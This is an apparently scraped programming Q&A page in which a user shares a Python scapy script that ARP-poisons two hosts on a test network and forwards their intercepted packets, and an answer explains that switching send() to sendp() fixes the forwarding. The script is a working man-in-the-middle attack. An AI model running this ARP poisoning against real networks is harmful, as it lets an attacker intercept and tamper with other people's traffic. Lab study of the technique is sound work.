Logo Questions Linux Laravel Mysql Ubuntu Git Menu
HTML CSS JAVASCRIPT SQL PYTHON PHP BOOTSTRAP JAVA JQUERY R React Kotlin
 

Man in the middle attack with scapy

Tags:

python

man-in-the-middle

network-programming

exploit

scapy

I'm trying to do a man in the middle attack with scapy on a test network. My setup is like this: enter image description here

Now that you get the idea, here's the code: 

from scapy.all import *
import multiprocessing
import time
class MITM:
  packets=[]
  def __init__(self,victim=("192.168.116.143","00:0c:29:d1:aa:71" ),node2=("192.168.116.1", "00:50:56:c0:00:08")):
    self.victim=victim
    self.node2=node2
    multiprocessing.Process(target=self.arp_poison).start()
    try:
      sniff(filter='((dst %s) and (src %s)) or ( (dst %s) and (src %s))'%(self.node2[0], self.victim[0],self.victim[0],self.node2[0]),prn=lambda x:self.routep(x))
    except KeyboardInterrupt as e:
      wireshark(packets)
    #self.arp_poison()
  def routep(self,packet):
    if packet.haslayer(IP):
      packet.show()
      if packet[IP].dst==self.victim[0]:
        packet[Ether].src=packet[Ether].dst
        packet[Ether].dst=self.victim[1]
      elif packet[IP].dst==self.node2[0]:
        packet[Ether].src=packet[Ether].dst
        packet[Ether].dst=self.node2[1]
      self.packets.append(packet)
      packet.display()
      send(packet)
      print len(self.packets)
      if len(self.packets)==10:
        wireshark(self.packets)
  def arp_poison(self):
    a=ARP()
    a.psrc=self.victim[0]
    a.pdst=self.node2[0]
    b=ARP()
    b.psrc=self.node2[0]
    b.pdst=self.victim[0]
    cond=True
    while cond:
      send(b)
      send(a)
      time.sleep(5)
      #cond=False
if __name__=="__main__":
  mitm=MITM()

This code is running on the VM2.

Arp poisoning works fine, I check the arp caches of both the machines and the behavior is as I expected. But inside routep, I modify the src and dst mac address and try to send the received packet to appropriate host, scapy gives a warning:

WARNING: more Mac address to reach destination not found. Using broadcast

And I see in the wireshark on VM2, the modified packets are not leaving the machine. Why would that be the case? Am I missing something?

like image 427
prongs Avatar asked Sep 30 '12 07:09

prongs

1 Answers

If you use scapy's send(), it works on the third layer. From scapy's documentation:

The send() function will send packets at layer 3. That is to say it will handle routing and layer 2 for you. The sendp() function will work at layer 2.

If you were to use sendp(), it won't use the default values for the destination's Mac address and your warning'll be gone.

like image 153
wegry Avatar answered Oct 30 '22 12:10

wegry
Sign in to Comment

Related questions

RuntimeWarning: DateTimeField received a naive datetime for auto_now
Python - Properly Kill/Exit Futures Thread?
Add Title to Seaborn Cat plot - Python [duplicate]
Why does isinstance require a tuple instead of any iterable? [duplicate]
Setting up a PyCharm remote conda interpreter
Implementing OData JSON interface on Django (Python)
some Numpy functions return ndarray instead of my subclass
Start Python Celery task via Redis Pub/Sub
Python: how to stream/pipe data out of gzip compression?
How to specify docstring for __init__ in Python C extension

Donate For Us

If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!